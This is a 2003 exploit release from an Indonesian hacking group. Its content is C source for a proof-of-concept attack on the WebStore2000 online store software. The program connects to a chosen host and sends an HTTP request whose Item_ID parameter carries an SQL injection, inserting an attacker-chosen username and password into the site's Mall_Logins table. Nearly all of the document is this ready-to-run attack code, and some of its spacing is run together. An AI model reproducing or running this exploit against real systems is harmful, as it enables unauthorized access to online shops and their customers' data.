$Id: bosen-exp.5,v1 02/06/2003 bosen Exp $

1ndonesian Security Team (1st)
Bosen Exploit #5 WebStore2000 SQL Injection
02/06/2003




[1st] WebStore2000 SQL Injection Exploits (in c) by negative
_______________________________________________________________________________


/*$Id: ws2k-ex.c,v 1.5 2003/06/02 14:18:01 jim Exp $*/

/* ws2k-ex.c -- WebStore2000 SQL Injection Proof of Concept
 *
 * Original exploit (ws2k-ex.pl) by Bosen <mobile@bosen.net>
 * Please see http://www.bosen.net/releases/?id=30 for details.
 *
 * Build tested successfully on 
 *- Darwin-6.6 (PPC) - OpenBSD-3.3 (x86) 
 *- Linux-2.4.18 (x86)- FreeBSD 4.8-STABLE (x86)
 *
 *- ngtv@mgnsm.nt/0603
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>

voidusage(void);

int
main(int argc, char *argv[])
{
intch, sock;
structhostent *he;
structsockaddr_in sin;
charbuffer[1024];
char   *target, *username, *password;

username = "bosen"; password = "gembel";
while ((ch = getopt(argc, argv, ":t:u:p:")) != -1)
switch (ch) {
case 't':
target = optarg;
break;
case 'u':
username = optarg;
break;
case 'p':
password = optarg;
break;
case 'h':
default:
usage();
}
argc -= optind;
argv += optind;

if (argc < 0)
usage();

if ((he = gethostbyname(target)) == NULL)
usage();

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(-1);
}

printf("ws2k-ex -- WebStore2000 SQL Injection Proof of Concept\n");
printf("Target: %s, Username: %s, Password: %s.\n", 
target, username, password);

sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr = *((struct in_addr *) he->h_addr);
bzero(&(sin.sin_zero), 8);

if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
{
perror("connect");
exit(1);
}

snprintf(buffer, sizeof(buffer),
    "GET /browse_item_details.asp?Item_ID=''; insert into Mall_Logins values ('%s','%s')-- HTTP/1.0\r\nReferer: http://www.bosen.net/releases/?id=30\r\nUser-Agent: Gembel/Sakti!\r\n\r\n", username, password);

if ((write(sock, buffer, sizeof(buffer))) <0)
{
perror("write");
exit(-1);
}

bzero(&buffer, sizeof(buffer));

close(sock);
exit(0);
}

void
usage(void)
{
extern char    *__progname;

(void) fprintf(stderr, "usage: %s [-t target] [-u user]", __progname);
(void) fprintf(stderr, " [-p password]\n");
exit(1);
}




Bosen <mobile@bosen.net>
======================
Original document can be fount at http://bosen.net/releases/?id=32